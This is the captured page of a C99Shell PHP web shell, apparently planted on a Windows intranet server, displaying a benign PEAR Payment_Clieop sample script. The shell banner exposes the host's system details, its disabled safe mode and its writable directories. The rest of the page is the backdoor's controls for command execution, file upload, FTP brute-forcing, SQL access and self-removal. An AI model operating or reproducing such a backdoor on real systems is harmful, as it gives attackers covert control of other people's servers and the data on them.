!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

C:\Intranet\C\xampp\php\PEAR\Payment_Clieop\Samples\   drwxrwxrwx
Free 4.09 GB of 39.52 GB (10.35%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     creditor.php (1.39 KB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
/**
* Clieop CREDITOR sample
*
* $Revision: 1.2 $
*/
include_once("Payment_Clieop/clieop.php");
include_once(
"Payment_Clieop/clieop_transaction.php");

header("Content-type: text/plain");

$clieopFile = new ClieopPayment();

//set clieop properties
$clieopFile->setTransactionType(CLIEOP_TRANSACTIE_BETALING);    // debtor transactions
$clieopFile->setPrincipalAccountNumber("123456789");            // principal bank account number
$clieopFile->setPrincipalName("PEAR CLIEOP CLASSES");            // Name of owner of principal account number
$clieopFile->setFixedDescription("PHP: Scripting the web");        // description for all transactions
$clieopFile->setSenderIdentification("PEAR");                    // Free identification
$clieopFile->setTest(true);                                        // Test clieop


//create creditor
$creditor = new TransactionPayment(CLIEOP_TRANSACTIE_BETALING);
$creditor->setAccountNumberSource("192837346");                    // my bank account number
$creditor->setAccountNumberDest("123456789");                    // principal bank account number
$creditor->setAmount(6900);                                        // amount in Eurocents (EUR 69.00)
$creditor->setName("Dave Mertens");                                // Name of creditor (holder of source account)
$creditor->setCity("Rotterdam");                                // City of creditor
$creditor->setDescription("Like we promised, your money");                // Just some info

//assign creditor record to clieop
$clieopFile->addPayment($creditor);

//Create clieop file
echo $clieopFile->writeClieop();
?>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #13 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.0156 ]--